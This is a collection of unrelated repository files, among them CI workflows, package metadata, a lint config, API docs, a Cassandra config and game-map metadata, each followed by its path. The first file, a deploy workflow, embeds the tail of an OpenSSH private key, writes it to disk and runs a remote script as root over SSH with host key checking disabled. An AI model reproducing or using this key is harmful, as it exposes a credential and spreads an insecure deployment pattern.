w89tU8QzlqgBgZc8Sxz7igeM3wnbT9bEKc+WPe1pkiLDBPnjG1HHRiqeztbs2tl9/s7bFV
JQ+en6YVDPMTnOatXsTTwdNVXzHAfQAAAAMBAAEAAAGAVwtVPWWBBrc9q1JdL21Yt/Yze/
ibNJNX13E/cYHJ3348y/IWvA3XyNWQ7LEv55yOttSwCiRLavJ8UX9ScGPNn8ls55erCDvp
uDDUaB+NL0LdfShiPpXJuvQ5LUDzPLbWABp4E4jlqVXGpkXHbTCthP65qatVS8tUazmRKY
UBM8OlSB8KEHHXqeawg/6+qYWTd1L5CF2TgbFkiQAA3yowkBBm1qOEnmzoAwq6eWh3EFjM
WLzSqA2Uq+EJn4bUhUZCN38XXuwwHTJEO3iZMfDszUzgaDaISOX5gfOiL2OCsiGYDhjXnL
X1o3Lw8f5RqWhkeKjvBS73kRx7mQnsWh+B5tnVflLcAVJmxgaa1bIQdqpmEX7kUMsyAtrW
8uk+oi7/WwnHZsfR9TeQeldxNl50lQzqWPJcC/6nxEXtGnJelrDA+RbyYtlw4b3m4swFq2
vqwoiqHoErNHijol4Ws6RjqqpEOL/rh9qf/FuAFE9Cz5/DUUbU8tBTYIM8qsiXxvNZAAAA
wGpo+JsCWJ+bG4cfDBSt4hdSKkisPB9N11PBDt+Yw+lf164yLCr5PY+1DheJGz8YhsyMSd
3JlbLcQwH+0VT1mSWGcIKWXjjcNBGRdhT/AmAUUOlWZIVlhNgQjsd1rudo8VGgwBOimqT6
a+59d5YgPTHJDsmiMCL6zsA+gmkLjEjMf12J9spUkIUGZ/OiTjHf4dIS/gLI0HuWIkdvdL
4JBsP5Xpc1i25r2g+/fKtQY4MfbFBIa5e8U5ShkKIp7n+bhgAAAMEA/kqzWHdqaiKTxUNK
Aq4EVb5Chf8kJx07f6ntlsjDmwtCAE5fJJGoz8lZ+hBE+vPpnZ1vtssbwx7cglnEt7WiJn
er2+7GaJJAYZwjxZX7Ti1SoyCegRI/ERd66AuYJJUFiYYOz5u/h5rewXygfYgH/8cthZ36
K03gncYg8hdS3G+GldLvXLuLZVT1SWEUeaBdw0PcMhI+mC/j54vTdx66axjECt2D9PFmi9
AeZx5+9ZJgMndkL5bixDdLDGOInEyTAAAAwQD1vWi4DF7daD/qEMFT9QVzSk4P6gbZp8Bm
nWDXjnY1Eh+T1HJOWZFoMFDrRWYy7IgJlnHBSEX3YdcNmhUBOPIxKGRUN4CbMxxv191Gjy
V9YOkoFcoTw0d9ZuOUXgukuQ3UGVA7CoQsWux6q7GHortxaA0W0s2h52ZIIxuXqzy7jOxl
Zs1SoP4GL9FWb+3t/p8bGgo1KaE/TxIWcEG3+p2aFYc24dIQSnc686MK6569q8773vPAV1
TMjM71VTsJ+K8AAAAkc3JpZWRqeEBTcmVla2FudGhzLU1hY0Jvb2stUHJvLmxvY2FsAQID
BAUGBw==
-----END OPENSSH PRIVATE KEY-----
EOF
chmod 400 .id_rsa
IPaddress=$(doctl compute droplet list mydroplet | awk 'NR==2 {print $3}')
echo "$IPaddress"
ssh -o StrictHostKeyChecking=no -i .id_rsa root@172.16.17.32 "sh /root/script2"
|
.github/workflows/do.yml
|
name: build
on: [push] # runs on every push
jobs:
build:
runs-on: ubuntu-latest
timeout-minutes: 10
strategy:
fail-fast: false
matrix:
node-version: [13.x]
steps:
- uses: actions/checkout@v1 # checkout latest commit
- name: Use Node.js ${{ matrix.node-version }} # set up Node.js
uses: actions/setup-node@v1
with:
node-version: ${{ matrix.node-version }}
- name: Install Dependencies # runs the npm ci command to install all dependencies
run: npm ci
env:
CI: "true"
- name: Install ESLint # installs ESLint - idk why it doesn't pull this out of the devDependencies but whatever
run: |
npm i -g eslint
npm i -D eslint
env:
CI: "true"
- name: Run ESLint # Runs ESLint on the project
run: npm run lint
env:
CI: "true"
# - name: Run Unit Tests # runs all unit tests
# run: npm test
# env:
# CI: "true"
# - name: Upload Coverage Report # runs the unit tests and uploads the coverage report from the unit tests to codecov.io
# env:
# CODECOV_TOKEN: ${{ secrets.CODECOV_TOKEN }}
# run: npx nyc --reporter=lcov npm run test && npx codecov -t $CODECOV_TOKEN
- name: Discord success notification # sends a Discord notification
env:
DISCORD_WEBHOOK: ${{ secrets.DISCORD_WEBHOOK }}
uses: Ilshidur/action-discord@master
with:
args: '✅ **SvCoreLib CI** (triggered by `{{GITHUB_ACTOR}}` on `{{GITHUB_REF}}`) was successful (see https://github.com/Sv443-Network/SvCoreLib/commit/{{GITHUB_SHA}}/checks)'
- name: Discord failure notification # sends a Discord notification
env:
DISCORD_WEBHOOK: ${{ secrets.DISCORD_WEBHOOK }}
uses: Ilshidur/action-discord@master
with:
args: '🚫 **SvCoreLib CI** (triggered by `{{GITHUB_ACTOR}}` on `{{GITHUB_REF}}`) has failed (see https://github.com/Sv443-Network/SvCoreLib/commit/{{GITHUB_SHA}}/checks)'
if: failure()
|
.github/workflows/build.yml
|
homepage: http://github.com/ekmett/folds
changelog-type: markdown
hash: 7bdce304037841cff3f3312fd783e6a751e9e1c17a92f72af74784cb5749dd7e
test-bench-deps: {}
maintainer: <NAME> <<EMAIL>>
synopsis: Beautiful Folding
changelog: |
0.7.6 [2021.02.17]
------------------
* Allow building with `lens-5.*`.
* The build-type has been changed from `Custom` to `Simple`.
To achieve this, the `doctests` test suite has been removed in favor of using
[`cabal-docspec`](https://github.com/phadej/cabal-extras/tree/master/cabal-docspec)
to run the doctests.
0.7.5 [2019.09.27]
------------------
* Remove the `hlint` test suite in favor of running `hlint` directly on CI.
0.7.4
-----
* Add a library dependency on the `doctests` test suite
0.7.3
-----
* Ensure that `HLint.hs` is shipped with the library
0.7.2
-----
* Revamp `Setup.hs` to use `cabal-doctest`. This makes it build
with `Cabal-2.0`, and makes the `doctest`s work with `cabal new-build` and
sandboxes.
0.7.1
-----
* Support `pointed` 5
* Support `transformers` 0.5
* Support `comonad` 5
* Support GHC 8
* Cleaned up the new warnings caused by `profunctors` 5.2
0.7
-----
* Folds are closed, corepresentable profunctors. This observation supplies us with many additional useful instances.
0.6.3
-------
* `reflection` 2 support
* Compiles warning-free on GHC 7.10
0.6.2
-----
* `contravariant` 1.0 support
0.6.1
-----
* Fixed bugs in several of the `Arrow` instances.
0.6
---
* Lazier `R1`.
* `MonadZip` instances
0.5.1
-----
* Lazier `R`.
0.5.0.1
-------
* Restore compatibility with GHC < 7.8
0.5
---
* `lens` 4 compatibility
0.1
---
* Repository Initialized
basic-deps:
semigroupoids: '>=4 && <6'
data-reify: '>=0.6 && <0.7'
reflection: '>=1.3 && <3'
base: '>=4 && <5'
comonad: '>=4 && <6'
pointed: '>=4 && <6'
unordered-containers: '>=0.2 && <0.3'
adjunctions: '>=4.2 && <5'
distributive: '>=0.3 && <1'
constraints: '>=0.4 && <1'
lens: '>=4 && <6'
bifunctors: '>=4 && <6'
contravariant: '>=0.4.2 && <2'
mtl: '>=2.0.1 && <2.3'
transformers: '>=0.3 && <0.6'
profunctors: '>=5 && <6'
vector: '>=0.10 && <0.13'
all-versions:
- '0.1'
- '0.2'
- '0.3'
- 0.5.0.1
- '0.6'
- 0.6.1
- 0.6.2
- 0.6.3
- '0.7'
- 0.7.1
- 0.7.2
- 0.7.3
- 0.7.4
- 0.7.5
- 0.7.6
author: <NAME>
latest: 0.7.6
description-type: markdown
description: |
folds
======
[](https://hackage.haskell.org/package/folds) [](https://github.com/ekmett/folds/actions?query=workflow%3AHaskell-CI)
A playground for working with different kinds of comonadic folds.
Contact Information
-------------------
Contributions and bug reports are welcome!
Please feel free to contact me through github or on the #haskell IRC channel on irc.freenode.net.
-<NAME>
license-name: BSD-3-Clause
|
packages/fo/folds.yaml
|
root: true
parser: vue-eslint-parser
extends:
- 'plugin:vue/essential'
- 'eslint:recommended'
env:
es6: true
node: true
browser: true
parserOptions:
parser: babel-eslint
sourceType: module
ecmaVersion: 2018
ecmaFeatures:
globalReturn: false
modules: true
experimentalObjectRestSpread: true
globals:
BigInt: true
rules:
require-yield:
- off
no-extra-parens:
- off
no-prototype-builtins:
- error
no-template-curly-in-string:
- error
array-callback-return:
- error
block-scoped-var:
- error
complexity:
- warn
curly:
- error
default-case:
- error
dot-location:
- error
- property
dot-notation:
- error
eqeqeq:
- error
no-alert:
- error
no-caller:
- error
no-else-return:
- error
no-empty-function:
- error
no-eq-null:
- error
no-eval:
- error
no-extend-native:
- error
no-extra-bind:
- error
no-floating-decimal:
- error
no-labels:
- error
no-loop-func:
- error
no-multi-spaces:
- error
no-multi-str:
- error
no-new:
- error
no-proto:
- error
no-restricted-properties:
- error
no-sequences:
- error
no-throw-literal:
- error
no-unused-expressions:
- error
no-useless-call:
- error
no-useless-return:
- error
yoda:
- error
strict:
- error
no-undef-init:
- error
no-unused-vars:
- error
handle-callback-err:
- error
array-bracket-newline:
- error
-
multiline: true
array-bracket-spacing:
- error
array-element-newline:
- off
-
multiline: true
brace-style:
- error
- stroustrup
camelcase:
- error
comma-dangle:
- error
- always-multiline
comma-spacing:
- error
comma-style:
- error
computed-property-spacing:
- error
eol-last:
- error
func-call-spacing:
- error
id-length:
- error
-
min: 2
exceptions:
- i
- x
- y
- e
- a
- b
id-match:
- error
- "^(([A-Za-z0-9]+){2,})|([A-Z][A-Z_0-9]+)|x|y|a|b|i|e$"
-
properties: false
onlyDeclarations: true
indent:
- error
- 2
-
SwitchCase: 1
key-spacing:
- error
keyword-spacing:
- error
max-statements-per-line:
- error
newline-per-chained-call:
- error
no-bitwise:
- error
no-multi-assign:
- error
no-trailing-spaces:
- error
no-whitespace-before-property:
- error
no-multiple-empty-lines:
- error
-
max: 2
maxEOF: 1
one-var-declaration-per-line:
- error
quote-props:
- error
- as-needed
quotes:
- error
- single
semi:
- error
- never
space-before-blocks:
- error
- always
space-before-function-paren:
- error
- always
spaced-comment:
- error
- always
arrow-body-style:
- error
- as-needed
arrow-spacing:
- error
generator-star-spacing:
- error
no-var:
- error
no-console:
- off
no-ex-assign:
- off
lines-between-class-members:
- error
- always
-
exceptAfterSingleLine: true
no-plusplus:
- error
implicit-arrow-linebreak:
- error
- beside
padding-line-between-statements:
- error
-
blankLine: always
prev:
- const
- let
- var
next: '*'
-
blankLine: any
prev:
- const
- let
- var
next:
- const
- let
- var
operator-linebreak:
- error
- after
-
overrides:
'?': before
':': before
'+': before
object-property-newline:
- error
-
allowAllPropertiesOnSameLine: true
no-magic-numbers:
- error
-
ignore:
- -1
- 0
- 1
- 2
- 10
ignoreArrayIndexes: true
enforceConst: true
detectObjects: false
object-curly-spacing:
- error
- always
# vue/component-name-in-template-casing:
# - error
# - kebab-case
vue/max-attributes-per-line:
- error
-
singleline: 3
vue/html-self-closing:
- error
-
html:
void: always
normal: never
component: always
svg: always
math: always
vue/no-v-html: off
|
.eslintrc.yaml
|
items:
- uid: NotaFiscalNet.Core.Interfaces.ISomenteLeitura
id: ISomenteLeitura
parent: NotaFiscalNet.Core.Interfaces
children:
- NotaFiscalNet.Core.Interfaces.ISomenteLeitura.SomenteLeitura
langs:
- csharp
- vb
name: ISomenteLeitura
fullName: NotaFiscalNet.Core.Interfaces.ISomenteLeitura
type: Interface
source:
remote:
path: src/NotaFiscalNet.Core/Interfaces/ISomenteLeitura.cs
branch: docs
repo: <EMAIL>:NotaFiscalNet/NotaFiscalNet.git
id: ISomenteLeitura
path: src/NotaFiscalNet.Core/Interfaces/ISomenteLeitura.cs
startLine: 5
assemblies:
- NotaFiscalNet.Core
namespace: NotaFiscalNet.Core.Interfaces
summary: "\r\nInterface que define a estrutura de um tipo que pode conter a situação de Apenas-Leitura.\r\n"
example: []
syntax:
content: public interface ISomenteLeitura
content.vb: Public Interface ISomenteLeitura
modifiers.csharp:
- public
- interface
modifiers.vb:
- Public
- Interface
- uid: NotaFiscalNet.Core.Interfaces.ISomenteLeitura.SomenteLeitura
id: SomenteLeitura
parent: NotaFiscalNet.Core.Interfaces.ISomenteLeitura
langs:
- csharp
- vb
name: SomenteLeitura
fullName: NotaFiscalNet.Core.Interfaces.ISomenteLeitura.SomenteLeitura
type: Property
source:
remote:
path: src/NotaFiscalNet.Core/Interfaces/ISomenteLeitura.cs
branch: docs
repo: <EMAIL>:NotaFiscalNet/NotaFiscalNet.git
id: SomenteLeitura
path: src/NotaFiscalNet.Core/Interfaces/ISomenteLeitura.cs
startLine: 7
assemblies:
- NotaFiscalNet.Core
namespace: NotaFiscalNet.Core.Interfaces
syntax:
content: >-
bool SomenteLeitura
{
get;
}
content.vb: ReadOnly Property SomenteLeitura As Boolean
parameters: []
return:
type: System.Boolean
modifiers.csharp:
- get
modifiers.vb:
- ReadOnly
references:
- uid: NotaFiscalNet.Core.Interfaces
isExternal: false
name: NotaFiscalNet.Core.Interfaces
fullName: NotaFiscalNet.Core.Interfaces
- uid: System.Boolean
parent: System
isExternal: true
name: Boolean
fullName: System.Boolean
- uid: System
isExternal: false
name: System
fullName: System
|
docs/src/api/NotaFiscalNet.Core.Interfaces.ISomenteLeitura.yml
|
---
#
# This is the canonical configuration for the `README.md`
# Run `make readme` to rebuild the `README.md`
#
# Name of this project
name: terraform-aws-ses-lambda-forwarder
# Logo for this project
#logo: docs/logo.png
# License of this project
license: "APACHE2"
# Canonical GitHub repo
github_repo: cloudposse/terraform-aws-ses-lambda-forwarder
# Badges to display
badges:
- name: "Build Status"
image: "https://travis-ci.org/cloudposse/terraform-aws-ses-lambda-forwarder.svg?branch=master"
url: "https://travis-ci.org/cloudposse/terraform-aws-ses-lambda-forwarder"
- name: "Latest Release"
image: "https://img.shields.io/github/release/cloudposse/terraform-aws-ses-lambda-forwarder.svg"
url: "https://github.com/cloudposse/terraform-aws-ses-lambda-forwarder/releases/latest"
- name: "Slack Community"
image: "https://slack.cloudposse.com/badge.svg"
url: "https://slack.cloudposse.com"
# Short description of this project
description: |-
This is a terraform module that creates an email forwarder using a combination of AWS SES and Lambda running the [aws-lambda-ses-forwarder](https://www.npmjs.com/package/aws-lambda-ses-forwarder) NPM module.
introduction: |-
This module provisions a NodeJS script as a AWS Lambda function that uses the inbound/outbound capabilities of AWS Simple Email Service (SES) to run a "serverless" email forwarding service.
Use this module instead of setting up an email server on a dedicated EC2 instance to handle email redirects. It uses AWS SES to receive email and then trigger a Lambda function to process it and forward it on to the chosen destination. This script will allow forwarding emails from any sender to verified destination emails (e.g. opt-in).
## Limitations
The SES service only allows sending email from verified addresses or domains. As such, it's mostly suitable for transactional emails (e.g. alerts or notifications). The incoming messages are modified to allow forwarding through SES and reflect the original sender. This script adds a `Reply-To` header with the original sender's email address, but the `From` header is changed to display the SES email address.
For example, an email sent by `<NAME> <<EMAIL>>` to `<EMAIL>` will be transformed to:
```
From: <NAME> at <EMAIL> <<EMAIL>>
Reply-To: <EMAIL>
```
To override this behavior, set a verified `fromEmail` address (e.g., `<EMAIL>`) in the config
object and the header will look like this.
```
From: <NAME> <<EMAIL>>
Reply-To: <EMAIL>
```
__NOTE__: SES only allows receiving email sent to addresses within verified domains. For more information,
see: http://docs.aws.amazon.com/ses/latest/DeveloperGuide/verify-domains.html
```
Initially SES users are in a sandbox environment that has a number of limitations. See:
http://docs.aws.amazon.com/ses/latest/DeveloperGuide/limits.html
# How to use this project
usage: |-
```hcl
variable "relay_email" {
default = "<EMAIL>"
description = "Email that used to relay from"
}
variable "forward_emails" {
type = "map"
default = {
"<EMAIL>" = ["<EMAIL>"]
"<EMAIL>" = ["<EMAIL>"]
}
description = "Emails forward map"
}
module "ses" {
source = "git::https://github.com/cloudposse/terraform-aws-ses-lambda-forwarder.git?ref=tags/0.1.0"
namespace = "${var.namespace}"
name = "${var.ses_name}"
stage = "${var.stage}"
region = "${var.ses_region}"
relay_email = "${var.relay_email}"
domain = "${var.parent_domain_name}"
forward_emails = "${var.forward_emails}"
}
```
references:
- name: "aws-lambda-ses-forwarder"
description: "A Node.js script for AWS Lambda that uses the inbound/outbound capabilities of AWS Simple Email Service (SES) to run a \"serverless\" email forwarding service."
url: "https://www.npmjs.com/package/aws-lambda-ses-forwarder"
include:
- "docs/targets.md"
- "docs/terraform.md"
# Contributors to this project
contributors:
- name: "<NAME>"
github: "goruha"
|
README.yaml
|
properties:
access_token_ttl_in_ms:
description: The TTL (Time To Live) length of time for the exchanged access token.
Measured in milliseconds. If not specified, defaults to `86400000`.
example: 15000
format: int64
max: 86400000
min: 1000
type: integer
issuer:
description: The name of the identity provider that will be issuing ID Tokens
for this API client. The `iss` claim in the JWT issued must match this string.
If not specified, defaults to the API client name.
example: https://purestorage.idp.okta.com
type: string
max_role:
description: The maximum role allowed for ID Tokens issued by this API client.
The bearer of an access token will be authorized to perform actions within the
intersection of this `max_role` and the role of the array user specified as
the `sub`. Valid values are `array_admin`, `storage_admin`, `ops_admin`, and
`readonly`. Users with the `readonly` (Read Only) role can perform operations
that convey the state of the array. Read Only users cannot alter the state of
the array. Users with the `ops_admin` (Ops Admin) role can perform the same
operations as Read Only users plus enable and disable remote assistance sessions.
Ops Admin users cannot alter the state of the array. Users with the `storage_admin`
(Storage Admin) role can perform the same operations as Read Only users plus
storage related operations, such as administering volumes, hosts, and host groups.
Storage Admin users cannot perform operations that deal with global and system
configurations. Users with the `array_admin` (Array Admin) role can perform
the same operations as Storage Admin users plus array-wide changes dealing with
global and system configurations. In other words, Array Admin users can perform
all operations.
example: storage_admin
required: true
type: string
public_key:
description: The API client's PEM formatted (Base64 encoded) RSA public key. Include
the `-----BEGIN PUBLIC KEY-----` and `-----END PUBLIC KEY-----` lines.
example: '-----BEGIN PUBLIC KEY----- <KEY>
<KEY>Q== -----END PUBLIC KEY-----'
required: true
type: string
type: object
|
html/models/FA2.1/api-client-post.yaml
|
name: TestSessionExploredWorkItemReference
uid: azure-devops-extension-api.TestSessionExploredWorkItemReference
package: azure-devops-extension-api
summary: ''
fullName: TestSessionExploredWorkItemReference
remarks: ''
isPreview: false
isDeprecated: false
type: interface
properties:
- name: associatedWorkItems
uid: >-
azure-devops-extension-api.TestSessionExploredWorkItemReference.associatedWorkItems
package: azure-devops-extension-api
summary: >-
Workitem references of workitems filed as a part of the current workitem
exploration.
fullName: associatedWorkItems
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'associatedWorkItems: TestSessionWorkItemReference[]'
return:
description: ''
type: >-
<xref uid="azure-devops-extension-api.TestSessionWorkItemReference"
/>[]
- name: endTime
uid: azure-devops-extension-api.TestSessionExploredWorkItemReference.endTime
package: azure-devops-extension-api
summary: Time when exploration of workitem ended.
fullName: endTime
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'endTime: Date'
return:
description: ''
type: Date
- name: id
uid: azure-devops-extension-api.TestSessionExploredWorkItemReference.id
package: azure-devops-extension-api
summary: Id of the workitem
fullName: id
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'id: number'
return:
description: ''
type: number
- name: startTime
uid: azure-devops-extension-api.TestSessionExploredWorkItemReference.startTime
package: azure-devops-extension-api
summary: Time when explore of workitem was started.
fullName: startTime
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'startTime: Date'
return:
description: ''
type: Date
- name: type
uid: azure-devops-extension-api.TestSessionExploredWorkItemReference.type
package: azure-devops-extension-api
summary: Type of the workitem
fullName: type
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'type: string'
return:
description: ''
type: string
extends: <xref uid="azure-devops-extension-api.TestSessionWorkItemReference" />
|
docs-ref-autogen/azure-devops-extension-api/TestSessionExploredWorkItemReference.yml
|
title: Documentación de la versión preliminar de IoT Plug and Play
summary: La versión preliminar de IoT Plug and Play permite definir un modelo de dispositivo que permita a las soluciones en la nube comprender automáticamente cualquier dispositivo y empezar a interactuar con él (y todo ello sin necesidad de escribir código de dispositivo).
metadata:
title: Documentación de la versión preliminar de IoT Plug and Play
description: La versión preliminar de IoT Plug and Play permite definir un modelo de dispositivo que permita a las soluciones en la nube comprender automáticamente cualquier dispositivo y empezar a interactuar con él (y todo ello sin necesidad de escribir código de dispositivo).
services: iot-pnp
ms.service: iot-pnp
ms.topic: landing-page
author: dominicbetts
ms.author: dobett
manager: philmea
ms.date: 10/31/2019
ms.openlocfilehash: 9469adb901c2da5f814088aa8eb59121889a0b78
ms.sourcegitcommit: 25490467e43cbc3139a0df60125687e2b1c73c09
ms.translationtype: HT
ms.contentlocale: es-ES
ms.lasthandoff: 04/09/2020
ms.locfileid: "80998287"
landingContent:
- title: Acerca de IoT Plug and Play
linkLists:
- linkListType: overview
links:
- text: ¿Qué es IoT Plug and Play?
url: overview-iot-plug-and-play.md
- linkListType: video
links:
- text: Introducción a IoT Plug and Play
url: https://channel9.msdn.com/Shows/Internet-of-Things-Show/Introduction-to-IoT-Plug-and-Play/player
- title: Desarrollo de dispositivos
linkLists:
- linkListType: quickstart
links:
- text: Conexión de un dispositivo de ejemplo a IoT Hub
url: quickstart-connect-pnp-device-c-windows.md
- text: Conexión de un dispositivo de ejemplo a IoT Central
url: ../iot-central/core/tutorial-connect-pnp-device.md?toc=/azure/iot-central-pnp/toc.json&bc=/azure/iot-central-pnp/breadcrumb/toc.json
- text: Uso de un modelo de funcionalidad de dispositivo para crear un dispositivo
url: quickstart-create-pnp-device-windows.md
- linkListType: tutorial
links:
- text: Creación y prueba de un modelo de funcionalidad del dispositivo mediante Visual Studio Code
url: tutorial-pnp-visual-studio-code.md
- text: Compilación de un dispositivo listo para la certificación
url: tutorial-build-device-certification.md
- text: Certificación del dispositivo
url: tutorial-certification-test.md
- linkListType: how-to-guide
links:
- text: Uso de Azure IoT Tools para Visual Studio Code
url: howto-develop-with-vs-vscode.md
- text: Incorporación al portal de Azure Certified for IoT
url: howto-onboard-portal.md
- linkListType: concept
links:
- text: Interfaces comunes
url: concepts-common-interfaces.md
- title: Crear soluciones
linkLists:
- linkListType: quickstart
links:
- text: Interacción con un dispositivo que esté conectado a una solución
url: quickstart-connect-pnp-device-solution-node.md
- linkListType: concept
links:
- text: Detección de modelo
url: concepts-model-discovery.md
- text: Interfaces comunes
url: concepts-common-interfaces.md
- linkListType: how-to-guide
links:
- text: Conexión a dispositivos desde una solución
url: howto-develop-solution.md
|
articles/iot-pnp/index.yml
|
cluster_name: 'Scalar DB Cluster'
num_tokens: 256
hinted_handoff_enabled: true
max_hint_window_in_ms: 10800000
hinted_handoff_throttle_in_kb: 1024
max_hints_delivery_threads: 2
hints_flush_period_in_ms: 10000
max_hints_file_size_in_mb: 128
batchlog_replay_throttle_in_kb: 1024
authenticator: AllowAllAuthenticator
authorizer: AllowAllAuthorizer
role_manager: CassandraRoleManager
roles_validity_in_ms: 2000
permissions_validity_in_ms: 2000
credentials_validity_in_ms: 2000
partitioner: org.apache.cassandra.dht.Murmur3Partitioner
cdc_enabled: false
disk_failure_policy: stop
commit_failure_policy: stop
prepared_statements_cache_size_mb:
thrift_prepared_statements_cache_size_mb:
key_cache_size_in_mb:
key_cache_save_period: 14400
row_cache_size_in_mb: 0
row_cache_save_period: 0
counter_cache_size_in_mb:
counter_cache_save_period: 7200
commitlog_sync: batch
commitlog_sync_batch_window_in_ms: 2
commitlog_compression:
- class_name: LZ4Compressor
commitlog_segment_size_in_mb: 32
seed_provider:
- class_name: org.apache.cassandra.locator.SimpleSeedProvider
parameters:
- seeds: _SEEDS_
concurrent_reads: _CONCURRENCY_
concurrent_writes: _CONCURRENCY_
concurrent_counter_writes: 2
concurrent_materialized_view_writes: 1
memtable_cleanup_threshold: 0.67
memtable_allocation_type: offheap_buffers
index_summary_capacity_in_mb:
index_summary_resize_interval_in_minutes: 60
trickle_fsync: false
trickle_fsync_interval_in_kb: 10240
storage_port: 7000
ssl_storage_port: 7001
listen_address: _IP_
start_native_transport: true
native_transport_port: 9042
start_rpc: false
rpc_address: _IP_
rpc_port: 9160
rpc_keepalive: true
rpc_server_type: sync
thrift_framed_transport_size_in_mb: 15
incremental_backups: false
snapshot_before_compaction: false
auto_snapshot: true
column_index_size_in_kb: 64
column_index_cache_size_in_kb: 2
compaction_throughput_mb_per_sec: 16
sstable_preemptive_open_interval_in_mb: 50
read_request_timeout_in_ms: 5000
range_request_timeout_in_ms: 10000
write_request_timeout_in_ms: 2000
counter_write_request_timeout_in_ms: 5000
cas_contention_timeout_in_ms: 1000
truncate_request_timeout_in_ms: 60000
request_timeout_in_ms: 10000
slow_query_log_timeout_in_ms: 500
cross_node_timeout: false
endpoint_snitch: SimpleSnitch
dynamic_snitch_update_interval_in_ms: 100
dynamic_snitch_reset_interval_in_ms: 600000
dynamic_snitch_badness_threshold: 0.1
request_scheduler: org.apache.cassandra.scheduler.NoScheduler
server_encryption_options:
internode_encryption: none
keystore: conf/.keystore
keystore_password: <PASSWORD>
truststore: conf/.truststore
truststore_password: <PASSWORD>
client_encryption_options:
enabled: false
optional: false
keystore: conf/.keystore
keystore_password: <PASSWORD>
internode_compression: dc
inter_dc_tcp_nodelay: false
tracetype_query_ttl: 86400
tracetype_repair_ttl: 604800
enable_user_defined_functions: false
enable_scripted_user_defined_functions: false
enable_materialized_views: true
windows_timer_interval: 1
transparent_data_encryption_options:
enabled: false
chunk_length_kb: 64
cipher: AES/CBC/PKCS5Padding
key_alias: testing:1
key_provider:
- class_name: org.apache.cassandra.security.JKSKeyProvider
parameters:
- keystore: conf/.keystore
keystore_password: <PASSWORD>
store_type: JCEKS
key_password: <PASSWORD>
tombstone_warn_threshold: 1000
tombstone_failure_threshold: 100000
batch_size_warn_threshold_in_kb: 5
batch_size_fail_threshold_in_kb: 50
unlogged_batch_across_partitions_warn_threshold: 10
compaction_large_partition_warning_threshold_mb: 100
gc_warn_threshold_in_ms: 1000
back_pressure_enabled: false
back_pressure_strategy:
- class_name: org.apache.cassandra.net.RateBasedBackPressure
parameters:
- high_ratio: 0.9
factor: 5
flow: FAST
commitlog_directory: _COMMITLOG_DIR_
data_file_directories:
- _DATA_DIR_
hints_directory: _HINTS_DIR_
saved_caches_directory: _SAVED_CACHES_DIR_
|
scripts/setup/default/cassandra.yaml
|
name: CI
on:
push:
branches: [ master ]
pull_request:
branches: [ master ]
workflow_dispatch:
jobs:
build:
runs-on: ubuntu-latest
strategy:
fail-fast: false
matrix:
include:
- php-versions: '5.6'
phpunit-versions: '5.7.27'
- php-versions: '7.0'
phpunit-versions: '6.5.14'
- php-versions: '7.1'
phpunit-versions: '7.5.20'
- php-versions: '7.2'
phpunit-versions: '7.5.20'
- php-versions: '7.3'
phpunit-versions: '7.5.20'
- php-versions: '7.4'
phpunit-versions: '7.5.20'
# - php-versions: '8.0'
# phpunit-versions: '9.5.1'
name: PHP ${{ matrix.php-versions }}, PHPUnit ${{ matrix.phpunit-versions }}
steps:
- name: Checkout
uses: actions/checkout@v2
- name: Setup PHP
uses: shivammathur/setup-php@v2
with:
php-version: ${{ matrix.php-versions }}
coverage: xdebug
tools: phpunit:${{ matrix.phpunit-versions }}
extensions: pdo_sqlite
- name: Get composer cache directory
id: composer-cache
run: echo "::set-output name=dir::$(composer config cache-files-dir)"
- name: Cache dependencies
uses: actions/cache@v2
with:
path: ${{ steps.composer-cache.outputs.dir }}
key: ${{ runner.os }}-composer-${{ hashFiles('**/composer.lock') }}
restore-keys: ${{ runner.os }}-composer-
- name: Install Dependencies
run: composer install --prefer-dist
- name: Run Tests
run: |
mkdir -p build/logs
phpunit --coverage-clover build/logs/clover.xml
- name: Downloading Scrutinizer CI binary
run: wget https://scrutinizer-ci.com/ocular.phar
- name: Upload coverage to Codecov
uses: codecov/codecov-action@v1
- name: Uploading code coverage to Scrutinizer CI
run: php ocular.phar code-coverage:upload --format=php-clover build/logs/clover.xml
|
.github/workflows/main.yml
|
--- !<MAP>
contentType: "MAP"
firstIndex: "2018-10-17 21:23"
game: "Unreal Tournament"
name: "CTF4-DiamondSword"
author: "'ArKile' + 'INFERNO'"
description: "None"
releaseDate: "2000-08"
attachments:
- type: "IMAGE"
name: "CTF4-DiamondSword_shot_1.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Maps/Multi-Team%20CTF/D/CTF4-DiamondSword_shot_1.png"
originalFilename: "ctf4diamondsword.zip"
hash: "813dee3d1c9dcc70ed7a108a4d4b6a08773d4f05"
fileSize: 1325415
files:
- name: "ctf4diamond.utx"
fileSize: 176591
hash: "99b27249f4f253411ffeaa7fd5093194a42d76ff"
- name: "Newmca16.umx"
fileSize: 447983
hash: "65e8ac37c3319392354d726fcc2c181e2a7891a2"
- name: "CTF4-DiamondSword.unr"
fileSize: 3372036
hash: "4a03966da03d8c4cecd4d86f00b4a2ef63c97dab"
otherFiles: 0
dependencies:
CTF4-DiamondSword.unr:
- status: "OK"
name: "Newmca16"
- status: "MISSING"
name: "CTF4"
- status: "OK"
name: "ctf4diamond"
downloads:
- url: "http://www.ut-files.com/index.php?dir=Maps/CTF4/&file=ctf4diamondsword.zip"
main: false
repack: false
state: "OK"
- url: "https://f002.backblazeb2.com/file/unreal-archive-files/Unreal%20Tournament/Maps/Multi-Team%20CTF/D/ctf4diamondsword.zip"
main: true
repack: false
state: "OK"
- url: "http://medor.no-ip.org/index.php?dir=Maps/CTF4&file=ctf4diamondsword.zip"
main: false
repack: false
state: "OK"
- url: "http://uttexture.com/UT/Downloads/Maps/CTF4/ctf4diamondsword.zip"
main: false
repack: false
state: "OK"
- url: "https://files.vohzd.com/unrealarchive/Unreal%20Tournament/Maps/Multi-Team%20CTF/D/8/1/3dee3d/ctf4diamondsword.zip"
main: false
repack: false
state: "OK"
- url: "https://unreal-archive-files.eu-central-1.linodeobjects.com/Unreal%20Tournament/Maps/Multi-Team%20CTF/D/8/1/3dee3d/ctf4diamondsword.zip"
main: false
repack: false
state: "OK"
deleted: false
gametype: "Multi-Team CTF"
title: "Diamond Sword (converted by Eagle)"
playerCount: "16-32"
themes:
Industrial: 0.8
